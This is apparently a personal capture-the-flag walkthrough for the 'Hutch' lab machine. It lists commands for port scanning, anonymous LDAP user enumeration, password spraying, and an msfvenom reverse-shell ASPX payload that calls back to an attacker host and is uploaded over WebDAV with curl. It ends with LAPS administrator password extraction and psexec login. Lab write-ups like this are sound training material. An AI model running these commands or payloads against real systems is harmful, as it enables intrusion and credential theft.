nmap -A -p- -oA hutch 192.168.59.122 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA hutch 192.168.59.122

nmap -sU -O -p- -oA hutch-udp 192.168.59.122

nikto -h 192.168.59.122:80

Pasted image 20210921121926.png

Pasted image 20210816133925.png

nmap -sCV -p80,443 192.168.59.122 -oN targeted

Pasted image 20210921111220.png

Pasted image 20210921120526.png

Vemos el nombre para el dc hutch.offsec

Pasted image 20210921121028.png

ldapsearch -x -h 192.168.59.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:

Pasted image 20210921121342.png

ldapsearch -x -h 192.168.59.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep description

Pasted image 20210921121450.png

crackmapexec smb 192.168.59.122 -u fmcsorley -p CrabSharkJellyfish192

Pasted image 20210921121618.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.59 LPORT=443 -f aspx > hutchreverse.aspx

curl -T '/home/kali/Desktop/boxes/Hutch/content/hatchreverse.aspx' 'http://192.168.59.122/' -u fmcsorley:CrabSharkJellyfish192

Pasted image 20210921124245.png

cd c:\Program Files\LAPS\

Pasted image 20210921124411.png

ldapsearch -x -h 192.168.59.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Pasted image 20210921124724.png

python3 /opt/impacket/examples/psexec.py hutch.offsec/administrator:'OkW.X#2M2Fu2FD'@192.168.59.122

Pasted image 20210921125314.png

boxes

copyright©2022 Cu3rv0x all rights reserved